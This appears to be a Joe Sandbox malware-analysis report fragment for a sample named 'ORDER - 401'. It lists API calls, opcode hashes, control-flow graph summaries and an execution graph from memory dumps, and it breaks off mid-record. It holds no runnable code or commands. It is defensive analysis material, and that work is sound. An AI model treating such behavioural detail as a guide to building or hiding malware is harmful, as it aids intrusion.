                                                                                  • Snapshot File: hcaresult_0_2_4b60000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: :$@$@$@$l
                                                                                  • API String ID: 0-1254695202
                                                                                  • Opcode ID: 30d844b4a1f51f4375ff7465f1e68bb40c8a9f5474c6cb3b8939a16bd1fc9d4a
                                                                                  • Instruction ID: 0804555794cfe0f199cb3f34f1205345bb0d9028ff89595574aafb027ce4dffd
                                                                                  • Opcode Fuzzy Hash: 30d844b4a1f51f4375ff7465f1e68bb40c8a9f5474c6cb3b8939a16bd1fc9d4a
                                                                                  • Instruction Fuzzy Hash: 36B21D30A10704CFD715EF78C854BAAB7B2FF89304F508999D54AAB360DB75A986CF81

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2295332344.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4b60000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: :$@$@$@$l
                                                                                  • API String ID: 0-1254695202
                                                                                  • Opcode ID: 1f3a79d054fd5c9ecef2351c61ada6bca0157c1732185746e866a6c20835f843
                                                                                  • Instruction ID: e8048a8e2c543d8e8fc0e756ffca285369f8fb2a762db9d4d37fe66edc59b6e8
                                                                                  • Opcode Fuzzy Hash: 1f3a79d054fd5c9ecef2351c61ada6bca0157c1732185746e866a6c20835f843
                                                                                  • Instruction Fuzzy Hash: 40B21B30A10705CFD715EF38C854BAAB7B2FF89304F518999D54AAB360DB75A986CF80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2297285517.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_74e0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a50a6d180f088419f9ec2116bf31e4d14687c2028d5e55fd274604365fbaa029
                                                                                  • Instruction ID: 23bde647599044e7a98fc6dd120ce28db7527b1814b4aa37bdef1213952c946b
                                                                                  • Opcode Fuzzy Hash: a50a6d180f088419f9ec2116bf31e4d14687c2028d5e55fd274604365fbaa029
                                                                                  • Instruction Fuzzy Hash: 53C1AAB17006098FDB29DB75C460BAFB7EAAF89301F54446ED24ACB390DB35E902CB51

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 023FB2FE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2292712886.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_23f0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID:
                                                                                  • API String ID: 4139908857-0
                                                                                  • Opcode ID: 4cfec5c2516249e954e41a1b4757ddce9eae1d259480cab5b9ae5c1bebeacb8b
                                                                                  • Instruction ID: 66fd4bdac885567653cee8e8737b90debcb65997f9d10d71016b5479287da828
                                                                                  • Opcode Fuzzy Hash: 4cfec5c2516249e954e41a1b4757ddce9eae1d259480cab5b9ae5c1bebeacb8b
                                                                                  • Instruction Fuzzy Hash: 407146B0A00B059FD764DF2AE45075ABBF6FF88308F00892ED54AD7A50DB35E946CB91

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • CreateActCtxA.KERNEL32(?), ref: 023F59A9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2292712886.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_23f0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID:
                                                                                  • API String ID: 2289755597-0
                                                                                  • Opcode ID: 337fec68ac1dc27384c6dc53906762e7d6de11c9ea7153c5db91de575218c964
                                                                                  • Instruction ID: 5b95dd25aab0d7ead9ae66ff031438d457395c28578f8136d15b95ea79115ff2
                                                                                  • Opcode Fuzzy Hash: 337fec68ac1dc27384c6dc53906762e7d6de11c9ea7153c5db91de575218c964
                                                                                  • Instruction Fuzzy Hash: FF41E2B0C00719CBDB25CFA9C984B9EBBB6FF49304F60805AD419AB251DB75694ACF90

Control-flow Graph (rendered image not preserved): 10 basic blocks, 4b61254-4b643dc; CallWindowProcW is called in block 4b6435a-4b64392, block 4b643ac-4b643cc calls an internal routine at 4b6112c, and all paths rejoin at 4b643cf-4b643dc.
APIs
• CallWindowProcW.USER32(?,?,?,?,?), ref: 04B64381
Memory Dump Source
• Source File: 00000000.00000002.2295332344.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4b60000_ORDER - 401.jbxd
Similarity
• API ID: CallProcWindow
• String ID:
• API String ID: 2714655100-0
• Opcode ID: 8b5371dc70663bd4250fd58e26cf7fc7b29e5f52f581d3181dd78eda5f04dfd3
• Instruction ID: f78cbdcdcd6dfe51d3e98a0831fdb230f764917406e518c87ec5832c0c50870f
• Opcode Fuzzy Hash: 8b5371dc70663bd4250fd58e26cf7fc7b29e5f52f581d3181dd78eda5f04dfd3
• Instruction Fuzzy Hash: CB4147B5A00705DFDB14CF99C488AAABBF5FF88314F24C499D519AB321D378A841CBA4

Control-flow Graph (rendered image not preserved): 8 basic blocks, 23f4514-23f5a41; the entry block 23f4514-23f59b9 ends with the same CreateActCtxA call at 023F59A9 as the function above, and the remaining block ranges and edges (23f59bb onward, last block 23f5a41 branching to itself) are the same as in that graph.
APIs
• CreateActCtxA.KERNEL32(?), ref: 023F59A9
Memory Dump Source
• Source File: 00000000.00000002.2292712886.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_23f0000_ORDER - 401.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 74dd324f97dc131e6cc8d7fd4d439b80dce0a39a20e03a4f474feabb1fce9a71
• Instruction ID: 8f3994bb00d4894737979bcc119090dda82d36cdeaee8c3585f11e14759f9c6f
• Opcode Fuzzy Hash: 74dd324f97dc131e6cc8d7fd4d439b80dce0a39a20e03a4f474feabb1fce9a71
• Instruction Fuzzy Hash: 2541E2B0C00719CBDB24CFAAC984B9EBBF6BF48304F60806AD508AB251DB756945CF90

Control-flow Graph (rendered image not preserved): 3 basic blocks, 23fd0f8-23fd642; DuplicateHandle is called in the entry block 23fd0f8-23fd61c, followed by a conditionally executed block 23fd61e-23fd624 and the exit block 23fd625-23fd642.
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,023FD54E,?,?,?,?,?), ref: 023FD60F
Memory Dump Source
• Source File: 00000000.00000002.2292712886.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_23f0000_ORDER - 401.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: d1dd8f6fe541308f5c2e97943359e8026b29347cd425b0972edd3b7dbf77cee0
• Instruction ID: 11750c58e8778838b43ebd1d533e8bcc8b6824e54258ebf0354fedd36adff5db
• Opcode Fuzzy Hash: d1dd8f6fe541308f5c2e97943359e8026b29347cd425b0972edd3b7dbf77cee0
• Instruction Fuzzy Hash: 1821E5B59002489FDB10CF9AD984ADEBBF8EB48314F14841AE918A7350D378A950CFA4

Control-flow Graph (rendered image not preserved): 4 basic blocks, 23fd581-23fd642; a short block 23fd581-23fd586 precedes the block 23fd588-23fd61c that calls DuplicateHandle, and the tail (23fd61e-23fd624, 23fd625-23fd642) is the same as in the function above.
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,023FD54E,?,?,?,?,?), ref: 023FD60F
Memory Dump Source
• Source File: 00000000.00000002.2292712886.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_23f0000_ORDER - 401.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: ef7253d1f115156fca3d7beead9997d1c290dcff68915682304f01c5c44ecb2f
• Instruction ID: 42c1ba3f1aca916a3d9023159e59388a0d33d75b93fe29f7fd62d13bad18037b
• Opcode Fuzzy Hash: ef7253d1f115156fca3d7beead9997d1c290dcff68915682304f01c5c44ecb2f
• Instruction Fuzzy Hash: 2F21E6B5D002599FDB10CF9AD984ADEBBF8EB48324F14841AE918A7350D378A940CF64

Control-flow Graph (rendered image not preserved): 5 basic blocks, 23fb298-23fb328; GetModuleHandleW is called in block 23fb2e0-23fb30b (the API line records a NULL module name, i.e. the process's own image base), preceded by a conditional block 23fb2da-23fb2dd and followed by a conditional block 23fb30d-23fb313 and the exit block 23fb314-23fb328.
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 023FB2FE
Memory Dump Source
• Source File: 00000000.00000002.2292712886.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_23f0000_ORDER - 401.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 4f7058e175f7a1c7051880a4c7d3779ccc953ffc98645d8d17c9ba84eeed8aaf
• Instruction ID: ff9e34d73c6d0789315b7bcc56c9ee426253c95f221adc2af315bf28d3a7eb97
• Opcode Fuzzy Hash: 4f7058e175f7a1c7051880a4c7d3779ccc953ffc98645d8d17c9ba84eeed8aaf
• Instruction Fuzzy Hash: E71110B5C002498FCB20CF9AD444BDEFBF9EF88328F10841AD519A7210C379A545CFA1

APIs
• PostMessageW.USER32(?,?,?,?), ref: 074E1235
Memory Dump Source
• Source File: 00000000.00000002.2297285517.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_74e0000_ORDER - 401.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
• Opcode ID: 02b2dc7ab394b366165d91fa0b3d1b6f94c0a7ae9ea1edd7479991a920e70b1f
• Instruction ID: 31e93dba91e9b6ce64e0f0c3745a1b90e2dbd413336b10e9090eb9062aa5f3c4
• Opcode Fuzzy Hash: 02b2dc7ab394b366165d91fa0b3d1b6f94c0a7ae9ea1edd7479991a920e70b1f
• Instruction Fuzzy Hash: 1F11B0B5800249DFDB20CF9AD985BDEFFF8EB48324F20841AE558A7650C775A544CFA1

APIs
• PostMessageW.USER32(?,?,?,?), ref: 074E1235
Memory Dump Source
• Source File: 00000000.00000002.2297285517.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_74e0000_ORDER - 401.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
• Opcode ID: 86190305de317daccd77acca598afbcf6f55c03b9b017a8d6d66156543f5f4cb
• Instruction ID: 6e81976e1109296d17c0e3f350cc2398af3f008d8e7a879a0b9d0eed6ce19394
• Opcode Fuzzy Hash: 86190305de317daccd77acca598afbcf6f55c03b9b017a8d6d66156543f5f4cb
• Instruction Fuzzy Hash: 6011D0B5800349DFDB20CF9AD985BDEBBF8FB48324F20841AE518A7640C375A944CFA1

Memory Dump Source
• Source File: 00000000.00000002.2291802844.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8bd000_ORDER - 401.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2b8f1cec6c4fb86b8e8593bdb692a365c1ff3afbd46cd20973f9bf1d14107111
• Instruction ID: c4c0f1afa9a8629f3015f432e3234e72ff52582fc3b267ac6442f18c34cf3714
• Opcode Fuzzy Hash: 2b8f1cec6c4fb86b8e8593bdb692a365c1ff3afbd46cd20973f9bf1d14107111
• Instruction Fuzzy Hash: 092145B1104304EFCB04DF04C9C0B66BF65FB98324F20C569E90A8B356D33AE846CBA6

Memory Dump Source
• Source File: 00000000.00000002.2291843684.00000000008CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008CD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8cd000_ORDER - 401.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 72805fa145b0c93919f0e81295b7798b4d637d3bc53708be03ae35542002b8c0
• Instruction ID: 0f3cf98a796a6e57f3718f816fc24896489a04ff3201eef88a80fdc59b2ceaf5
• Opcode Fuzzy Hash: 72805fa145b0c93919f0e81295b7798b4d637d3bc53708be03ae35542002b8c0
• Instruction Fuzzy Hash: BC21B0755047049FCB14EF18D580F26BB65FB84314F24C56DD94A8B256C33AD847CA61

Memory Dump Source
• Source File: 00000000.00000002.2291843684.00000000008CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008CD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8cd000_ORDER - 401.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b81eb4da33c6587cba821d332bd7db5139235dda0ba35c92b99c1977fe145b4f
• Instruction ID: 8fa1fea0256ec801a73a77ed24765d3e251f1e9d7318134c9ff84899d6e3f477
• Opcode Fuzzy Hash: b81eb4da33c6587cba821d332bd7db5139235dda0ba35c92b99c1977fe145b4f
• Instruction Fuzzy Hash: FD21CFB1504304AFDB05EF14D9C0F26BBB5FB84318F24C97DE9498B292C33AE846CA61

Memory Dump Source
• Source File: 00000000.00000002.2291802844.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8bd000_ORDER - 401.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
• Instruction ID: fcd7a70bad9e07ddf182ea92313939ccf3077eb9902907cd1504ee089388f229
• Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
• Instruction Fuzzy Hash: 8A11DF72404340DFCB12CF00D5C0B56BF72FB94324F24C6A9D8094B656C33AE85ACBA2

Memory Dump Source
• Source File: 00000000.00000002.2291843684.00000000008CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008CD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8cd000_ORDER - 401.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
• Instruction ID: cecb755ef2a03353696f48b0bb9603fceed3ed289ed504e8c8217d54eda899cd
• Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
• Instruction Fuzzy Hash: 26118B76504380DFDB16DF14D9C4B15BBB2FB84314F24C6AED8498B696C33AE84ACB61

Memory Dump Source
• Source File: 00000000.00000002.2291843684.00000000008CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008CD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8cd000_ORDER - 401.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
• Instruction ID: 901200583ba5bceb48ae77c43e382631a0034e0b6aab8e2d98defc7044981756
• Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
• Instruction Fuzzy Hash: D911BB75504780DFCB11DF18D5C4B15BBB2FB84314F24C6AED8498B656C33AD84ACBA2

Memory Dump Source
• Source File: 00000000.00000002.2291802844.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8bd000_ORDER - 401.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7897f3877a63adb1f05ed8f575c82257c00186cbb0f43a256a57910322f5a47a
• Instruction ID: 847450f83e39e28a75a430c31e3828382bc24410bdb39581f85fc40c9458a75a
• Opcode Fuzzy Hash: 7897f3877a63adb1f05ed8f575c82257c00186cbb0f43a256a57910322f5a47a
• Instruction Fuzzy Hash: 6C012B71004344BAE7208F25CDC4BE6BFDCEF41364F18C51AED088A382EE399840C675

Memory Dump Source
• Source File: 00000000.00000002.2291802844.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8bd000_ORDER - 401.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 082ee8f1c928e1dd26cf610fb6dab6e22e732b7f89f494f0156ae21aa342ab5a
• Instruction ID: 9fe85ee8c42e21e336205ba8c74773a33cc688bebaa0c9aa4b3576b06caf9ff7
• Opcode Fuzzy Hash: 082ee8f1c928e1dd26cf610fb6dab6e22e732b7f89f494f0156ae21aa342ab5a
• Instruction Fuzzy Hash: 84F06271404344AAE7208E15D9C4BA2FFD8EB51735F18C45AED088A286D6799844CBB5

Memory Dump Source
• Source File: 00000000.00000002.2295332344.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4b60000_ORDER - 401.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 683fdfcf62469ce881b6ea2ec73c90205e01df86324cf65109d8f8270496a33d
• Instruction ID: 6964d54d919d60a9d65a3206d4e48ce533741f0539cd77382edc84437a82dd68
• Opcode Fuzzy Hash: 683fdfcf62469ce881b6ea2ec73c90205e01df86324cf65109d8f8270496a33d
• Instruction Fuzzy Hash: E512A1B0D01745AAE756DF65E84C1893BA2FB6231CF904709D2612A2F6DBBC194BCFC4

Memory Dump Source
• Source File: 00000000.00000002.2292712886.00000000023F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_23f0000_ORDER - 401.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c10ca9676f2971f45a4f77ab4b275f319f8f7bfcae7e5cb2a08ec1a1bcf29623
• Instruction ID: 0f2528ec4cfa148daa804192ea8f82db60d5d5d2553efdc8909c97e14585e924
• Opcode Fuzzy Hash: c10ca9676f2971f45a4f77ab4b275f319f8f7bfcae7e5cb2a08ec1a1bcf29623
• Instruction Fuzzy Hash: 06A17032E003098FCF15DFB4D84499EB7B2FF94304B1545AAE905AB2A5DB75E945CF80

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2295332344.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4b60000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3151ff9d2e15c9aa00f2e8d11cf8d62c01bd12cc2870e0f38da860ee4489419e
                                                                                  • Instruction ID: 056781aeaceb80be527e60da6c9d08d612856623b78b4adb266752d48f81c68d
                                                                                  • Opcode Fuzzy Hash: 3151ff9d2e15c9aa00f2e8d11cf8d62c01bd12cc2870e0f38da860ee4489419e
                                                                                  • Instruction Fuzzy Hash: 51C105B0C01745ABD716DF65E8481897BB2FBA6328F904709D1616B2F6DBBC184BCF84

Execution Graph

Execution Coverage: 1.2%
Dynamic/Decrypted Code Coverage: 5.3%
Signature Coverage: 8.3%
Total number of Nodes: 132
Total number of Limit Nodes: 9

API call sites named in the graph (node address: API, extracted from the dump below):
• 1052b60, 1052c1f, 1052c70, 1052df0, 10535c0, 42c313: LdrInitializeThunk
• 41b9b3: RtlFreeHeap, LdrInitializeThunk
• 42ccb3, 42ccde: NtClose
• 42cfde, 42edd3, 42ee13: RtlAllocateHeap
• 42d02e, 42ecf3: RtlFreeHeap
• 42d053, 42d07e: ExitProcess
• 414643: PostThreadMessageW
• 417de3: LdrLoadDll

Raw node/edge dump (decimal node id, address, optional API name; edges as id->id):
execution_graph 90465 42c2c3 90466 42c2e0 90465->90466 90469 1052df0 LdrInitializeThunk 90466->90469 90467 42c308 90469->90467 90470 424fa3 90471 424fbf 90470->90471 90472 424fe7 90471->90472 90473 424ffb 90471->90473 90474 42ccb3 NtClose 90472->90474 90480 42ccb3 90473->90480 90476 424ff0 90474->90476 90477 425004 90483 42ee13 RtlAllocateHeap 90477->90483 90479 42500f 90481 42cccd 90480->90481 90482 42ccde NtClose 90481->90482 90482->90477 90483->90479 90582 425333 90583 42534c 90582->90583 90584 425394 90583->90584 90587 4253d4 90583->90587 90589 4253d9 90583->90589 90585 42ecf3 RtlFreeHeap 90584->90585 90586 4253a1 90585->90586 90588 42ecf3 RtlFreeHeap 90587->90588 90588->90589 90590 42fd93 90591 42fda3 90590->90591 90592 42fda9 90590->90592 90595 42edd3 90592->90595 90594 42fdcf 90598 42cfb3 90595->90598 90597 42edee 90597->90594 90599 42cfcd 90598->90599 90600 42cfde RtlAllocateHeap 90599->90600 90600->90597 90484 414063 90485 414082 90484->90485 90487 42cf23 90484->90487 90488 42cf40 90487->90488 90491 1052c70 LdrInitializeThunk 90488->90491 90489 42cf68 90489->90485 90491->90489 90601 4145d3 90602 4145ec 90601->90602 90607 417d83 90602->90607 90604 41460a 90605 414656 90604->90605 90606 414643 PostThreadMessageW 90604->90606 90606->90605 90608 417da7 90607->90608 90609 417de3 LdrLoadDll 90608->90609 90610 417dae 90608->90610 90609->90610 90610->90604 90611 41b893 90612 41b8d7 90611->90612 90613 41b8f8 90612->90613 90614 42ccb3 NtClose 90612->90614 90614->90613 90615 41ea93 90616 41eab9 90615->90616 90620 41ebad 90616->90620 90621 42fec3 90616->90621 90618 41eb4e 90619 42c313 LdrInitializeThunk 90618->90619 90618->90620 90619->90620 90622 42fe33 90621->90622 90623 42fe90 90622->90623 90624 42edd3 RtlAllocateHeap 90622->90624 90623->90618 90625 42fe6d 90624->90625 90626 42ecf3 RtlFreeHeap 90625->90626 90626->90623 90492 4019e4 90493 401a01 90492->90493 90496 430263 90493->90496
90499 42e8b3 90496->90499 90500 42e8d9 90499->90500 90511 407353 90500->90511 90502 42e8ef 90503 401a65 90502->90503 90514 41b6a3 90502->90514 90505 42e90e 90506 42e923 90505->90506 90529 42d053 90505->90529 90525 428853 90506->90525 90509 42e93d 90510 42d053 ExitProcess 90509->90510 90510->90503 90513 407360 90511->90513 90532 416a33 90511->90532 90513->90502 90515 41b6cf 90514->90515 90556 41b593 90515->90556 90518 41b714 90521 41b730 90518->90521 90523 42ccb3 NtClose 90518->90523 90519 41b6fc 90520 41b707 90519->90520 90522 42ccb3 NtClose 90519->90522 90520->90505 90521->90505 90522->90520 90524 41b726 90523->90524 90524->90505 90526 4288b5 90525->90526 90528 4288c2 90526->90528 90567 418bf3 90526->90567 90528->90509 90530 42d06d 90529->90530 90531 42d07e ExitProcess 90530->90531 90531->90506 90533 416a4d 90532->90533 90535 416a66 90533->90535 90536 42d6d3 90533->90536 90535->90513 90538 42d6ed 90536->90538 90537 42d71c 90537->90535 90538->90537 90543 42c313 90538->90543 90544 42c32d 90543->90544 90550 1052c0a 90544->90550 90545 42c359 90547 42ecf3 90545->90547 90553 42d003 90547->90553 90549 42d78c 90549->90535 90551 1052c11 90550->90551 90552 1052c1f LdrInitializeThunk 90550->90552 90551->90545 90552->90545 90554 42d01d 90553->90554 90555 42d02e RtlFreeHeap 90554->90555 90555->90549 90557 41b5ad 90556->90557 90561 41b689 90556->90561 90562 42c3b3 90557->90562 90560 42ccb3 NtClose 90560->90561 90561->90518 90561->90519 90563 42c3cd 90562->90563 90566 10535c0 LdrInitializeThunk 90563->90566 90564 41b67d 90564->90560 90566->90564 90569 418bf6 90567->90569 90568 41911b 90568->90528 90569->90568 90575 414243 90569->90575 90571 418d4a 90571->90568 90572 42ecf3 RtlFreeHeap 90571->90572 90573 418d62 90572->90573 90573->90568 90574 42d053 ExitProcess 90573->90574 90574->90568 90579 414263 90575->90579 90577 4142c2 90577->90571 90578 4142cc 90578->90571 90579->90578 90580 41b9b3 RtlFreeHeap LdrInitializeThunk 90579->90580 90580->90577 90627 419335 90628 42ccb3 NtClose
90627->90628 90629 41933f 90628->90629 90581 1052b60 LdrInitializeThunk

Control-flow Graph

control_flow_graph (basic block id: address range, calls; edges as id->id):
• 253: 417d83-417dac, call 42f8d3
• 256: 417db2-417dc0, call 42fed3
• 257: 417dae-417db1
• 260: 417dd0-417de1, call 42e383
• 261: 417dc2-417dcd, call 430173
• 266: 417de3-417df7, LdrLoadDll
• 267: 417dfa-417dfd
• edges: 253->256, 253->257, 256->260, 256->261, 260->266, 260->267, 261->260, 266->267
APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417DF5
Memory Dump Source
• Source File: 00000005.00000002.2476991875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_ORDER - 401.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
• Opcode ID: 68a1343607c5a450f7786a2c1a825d0cce543795bf5a9c2a52c786633a32a0ce
• Instruction ID: 88b9ef28133dc456cab6c81c5f600716b01c30102915f9fd8f3ec612534eff34
• Opcode Fuzzy Hash: 68a1343607c5a450f7786a2c1a825d0cce543795bf5a9c2a52c786633a32a0ce
• Instruction Fuzzy Hash: 23011EB5E0020DABDF10DAE5DC42FEEB3789F54308F0081AAE90897241F635EB598B95

Control-flow Graph

control_flow_graph (basic block id: address range, calls; edges as id->id):
• 278: 42ccb3-42ccec, call 404623, call 42dea3, NtClose
APIs
• NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CCE7
Memory Dump Source
• Source File: 00000005.00000002.2476991875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_ORDER - 401.jbxd
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: 78e2a7f370486fb8e38ebc04d0bcf967f8016fa95c29a15494aeb31deec0d7bf
• Instruction ID: d46bfabfc098e6d5a2aad821b6b2a61ea91c21e50ceafb7c4f345b9124cf626d
• Opcode Fuzzy Hash: 78e2a7f370486fb8e38ebc04d0bcf967f8016fa95c29a15494aeb31deec0d7bf
• Instruction Fuzzy Hash: 98E026366006043BC210FA6ADC01FD7776CDFC5B10F000819FA0867242C7B4B90087F4
APIs
Memory Dump Source
• Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 2d98ecf426a0067fc6dd25b39c831091943ad133a95e6e4dcf2d6e2e60f356a6
• Instruction ID: d737fd3380421eb5d08c2c783d4e58ee5c78ff2e0529cdd53a1fd26495f7ff54
• Opcode Fuzzy Hash: 2d98ecf426a0067fc6dd25b39c831091943ad133a95e6e4dcf2d6e2e60f356a6
• Instruction Fuzzy Hash: 589002B12025000351057158841461A400E97E0201B55C022E5414590DC52589916225

APIs
Memory Dump Source
• Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 61e17b97c6b63987dacd273c9a687ac791b5d70ab7b81e4da4eb5b1899462b18
• Instruction ID: eb249eeb24479089632b5d725758b86f09f2c9ccb826e5f24c676ce559a09c19
• Opcode Fuzzy Hash: 61e17b97c6b63987dacd273c9a687ac791b5d70ab7b81e4da4eb5b1899462b18
• Instruction Fuzzy Hash: 2790027120150413E1117158850470B000D97D0241F95C413A4824558DD6568A52A221

APIs
Memory Dump Source
• Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 73d272d7335d1182a2cbd558f4144b8dc977f5c513dd8b0ee962390414dcd136
• Instruction ID: 92de694c9e9b6133db135cd61d34511add8113cb14b06e017181d568aa353d32
• Opcode Fuzzy Hash: 73d272d7335d1182a2cbd558f4144b8dc977f5c513dd8b0ee962390414dcd136
